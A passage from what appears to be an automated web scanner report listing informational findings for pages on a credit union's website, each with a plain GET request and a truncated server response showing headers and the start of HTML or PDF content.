Last-Modified: Mon, 13 Sep 2010 22:31:43 GMT
ETag: "47e-a92af1c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:50 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

............ .h.......(....... ..... ........................................!...........................'...'.......................$...K...b...U...,..........+...Y...y...v...P...$...............G..
...[SNIP]...

23.50. https://www.navyfederal.org/how-to-become-a-member.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /how-to-become-a-member.php

Request

GET /how-to-become-a-member.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.51. https://www.navyfederal.org/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /index.php

Request

GET /index.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...

23.52. https://www.navyfederal.org/life-money/family-life.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /life-money/family-life.php

Request

GET /life-money/family-life.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

23.53. https://www.navyfederal.org/life-money/kids-college-retirement.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /life-money/kids-college-retirement.php

Request

GET /life-money/kids-college-retirement.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.54. https://www.navyfederal.org/life-money/managing-your-money/managing-your-money.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /life-money/managing-your-money/managing-your-money.php

Request

GET /life-money/managing-your-money/managing-your-money.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.55. https://www.navyfederal.org/life-money/military-life.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /life-money/military-life.php

Request

GET /life-money/military-life.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.56. https://www.navyfederal.org/life-money/savings-investments.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /life-money/savings-investments.php

Request

GET /life-money/savings-investments.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

23.57. https://www.navyfederal.org/life-money/work-life.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /life-money/work-life.php

Request

GET /life-money/work-life.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.58. https://www.navyfederal.org/membership-benefits/military-exclusives.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /membership-benefits/military-exclusives.php

Request

GET /membership-benefits/military-exclusives.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

23.59. https://www.navyfederal.org/membership-benefits/offers-discounts/auto-199.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /membership-benefits/offers-discounts/auto-199.php

Request

GET /membership-benefits/offers-discounts/auto-199.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.60. https://www.navyfederal.org/membership-benefits/offers-discounts/balanceTransferOffer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /membership-benefits/offers-discounts/balanceTransferOffer.php

Request

GET /membership-benefits/offers-discounts/balanceTransferOffer.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.61. https://www.navyfederal.org/membership-benefits/offers-discounts/offers-discounts.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /membership-benefits/offers-discounts/offers-discounts.php

Request

GET /membership-benefits/offers-discounts/offers-discounts.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.62. https://www.navyfederal.org/mobile/mobiledemo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /mobile/mobiledemo.php

Request

GET /mobile/mobiledemo.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.63. https://www.navyfederal.org/pdf/ebrochures/1116e.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /pdf/ebrochures/1116e.pdf

Request

GET /pdf/ebrochures/1116e.pdf HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:56 GMT
Server: Apache
Last-Modified: Sun, 12 Sep 2010 12:20:12 GMT
ETag: "1bf7f-5f5700"
Accept-Ranges: bytes
Content-Length: 114559
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:56 GMT
Connection: close
Content-Type: application/pdf

%PDF-1.4%....
15 0 obj<</Linearized 1/L 114559/O 17/E 78540/N 2/T 114212/H [ 876 242]>>endobj
xref
15 29
0000000016 00000 n
0000001118 00000 n
0000001199 00000 n
0000001577
...[SNIP]...

23.64. https://www.navyfederal.org/pdf/publications/NFCU_198_PrivacyPolicy.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /pdf/publications/NFCU_198_PrivacyPolicy.pdf

Request

GET /pdf/publications/NFCU_198_PrivacyPolicy.pdf HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:56 GMT
Server: Apache
Last-Modified: Sun, 12 Sep 2010 12:20:23 GMT
ETag: "b3c6e-1072fc0"
Accept-Ranges: bytes
Content-Length: 736366
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:56 GMT
Connection: close
Content-Type: application/pdf

%PDF-1.3
%....
1 0 obj
<<
/Length 46 0 R
/Filter /FlateDecode
/Domain [ 0 1
]
/FunctionType 4
/Range [ 0 1 0 1 0 1 0 1
]
>>
stream
X....    .0..[....GA....9DA...C.....}T:...Qr6.vYn.B..Y...-.\j...
...[SNIP]...

23.65. https://www.navyfederal.org/products-services/business-services/business-services.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/business-services/business-services.php

Request

GET /products-services/business-services/business-services.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.66. https://www.navyfederal.org/products-services/business-services/credit-cards.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/business-services/credit-cards.php

Request

GET /products-services/business-services/credit-cards.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.67. https://www.navyfederal.org/products-services/business-services/loans.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/business-services/loans.php

Request

GET /products-services/business-services/loans.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.68. https://www.navyfederal.org/products-services/business-services/retirement-insurance.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/business-services/retirement-insurance.php

Request

GET /products-services/business-services/retirement-insurance.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.69. https://www.navyfederal.org/products-services/business-services/savings-checking.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/business-services/savings-checking.php

Request

GET /products-services/business-services/savings-checking.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.70. https://www.navyfederal.org/products-services/cards/creditcards/creditcard-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/cards/creditcards/creditcard-rates.php

Request

GET /products-services/cards/creditcards/creditcard-rates.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 42499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.71. https://www.navyfederal.org/products-services/cards/creditcards/creditcards.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/cards/creditcards/creditcards.php

Request

GET /products-services/cards/creditcards/creditcards.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.72. https://www.navyfederal.org/products-services/cards/debit-cards.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/cards/debit-cards.php

Request

GET /products-services/cards/debit-cards.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 33350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.73. https://www.navyfederal.org/products-services/cards/giftcards/gift-cards.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/cards/giftcards/gift-cards.php

Request

GET /products-services/cards/giftcards/gift-cards.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.74. https://www.navyfederal.org/products-services/checking-savings/certificates-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/certificates-rates.php

Request

GET /products-services/checking-savings/certificates-rates.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 98990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.75. https://www.navyfederal.org/products-services/checking-savings/certificates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/certificates.php

Request

GET /products-services/checking-savings/certificates.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
...[SNIP]...

23.76. https://www.navyfederal.org/products-services/checking-savings/checking-protection.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/checking-protection.php

Request

GET /products-services/checking-savings/checking-protection.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.77. https://www.navyfederal.org/products-services/checking-savings/checking-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/checking-rates.php

Request

GET /products-services/checking-savings/checking-rates.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.78. https://www.navyfederal.org/products-services/checking-savings/checking.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/checking.php

Request

GET /products-services/checking-savings/checking.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.79. https://www.navyfederal.org/products-services/checking-savings/direct-deposit.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/direct-deposit.php

Request

GET /products-services/checking-savings/direct-deposit.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:44 GMT
Vary: Accept-Encoding
